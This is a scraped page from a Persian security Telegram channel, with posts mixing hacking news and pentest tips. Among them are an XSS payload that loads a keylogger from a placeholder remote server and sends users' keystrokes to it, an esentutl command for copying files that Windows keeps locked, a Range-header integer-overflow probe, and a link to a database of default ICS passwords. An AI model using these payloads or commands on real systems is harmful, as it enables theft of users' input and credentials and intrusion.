امنیت اطلاعات
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
روت شدن اندروید ۱۰ با باز کردن یک لینک در کروم!


#android
#poc
#privesc

@sec_nerd
حرکت جدید مایکروسافت و ارائه ی Application Guard باعث شد که حتی با فعال شدن ماکروها هم نشه کاری از پیش برد و کسانی که با spear phishing اهداف خودشون رو آلوده میکردن کارشون سخت تر از قبل بشه!


#spear_phishing
#microsoft
#windows


@sec_nerd
استخراج پسورد دوربین های cctv شرکت bosch بدون نیاز به احراز هویت

#cctv
#network



@sec_nerd
درود بر ادمین های همیشه آپدیت کشورمون.
رتبه سوم هم بد نیست!


#security
#botnet
#ddos


@sec_nerd
کپی کردن فایلهای قفل شده توسط سیستم عامل ویندوز ۱۰ با دستور زیر:

C:\WINDOWS\system32\esentutl.exe /y <SOURCE> /vss /d <DEST>


#windows
#pentest


@sec_nerd
مجموعه پسوردهای پیشفرض دستگاه های کنترل صنعتی

https://www.critifence.com/default-password-database/


#SCADA
#pentest
#network


@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
Manually Detect Remote Integer Overflow:

1. Note Content-Length. EX: 612
2. Take NO < Content-Length. Ex: 610
3. Add (610+612 = 1222)
4. Request Header - 'Range: bytes= -1222' => SAME RESPONSE
5. Subtract 9223372036854775808 - 1222 = 9223372036854774586
6. Request With Header - 'Range: bytes= -1222,-9223372036854774586' => BooM :)



#web
#pentest


@sec_nerd
امنیت اطلاعات pinned «گروه امنیت اطلاعات https://t.iss.one/joinchat/Cu-7qUvIA5ULBMsmH9yVzA @sec_nerd»
This media is not supported in your browser
VIEW IN TELEGRAM
Remote XSS Keylogger:

Payload: <svg/onload=setTimeout(function(){d=document;z=d.createElement("script");z.src="//YOUR_SERVER/keylogger.js";d.body.appendChild(z)},0)>

This will log a user's input to your remote server.

keylogger.php: https://pastebin.com/hzzQqSFt

keylogger.js: https://pastebin.com/ySyG4TiN

#BugBounty
#web
#pentest
#XSS


@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
فیسبوک دوربین گوشی های آیفون را بصورت مخفیانه روشن میکند!
این اتفاق از سوی برخی کاربران در توییتر گزارش و ویدیوهای اثبات آن منتشر شده است.
هنوز مشخص نیست باز شدن دوربین جلوی گوشی های آیفون یک مشکل نرم افزاری ست یا فیسبوک در حال جاسوسی از کاربران خود میباشد.



https://thehackernews.com/2019/11/facebook-ios-camera.html



#facebook
#privacy
#news



@sec_nerd
اگر سایت هدف اپلیکیشن اندروید دارد:

بعد از دانلود اپ
از Diggy برای استخراج آدرس های وب آن استفاده کنید
از Arjun برای پیدا کردن پارامترهای ارسالی به آدرس های مذکور استفاده کنید.



#android
#pentest
#web
#bugbounty



@sec_nerd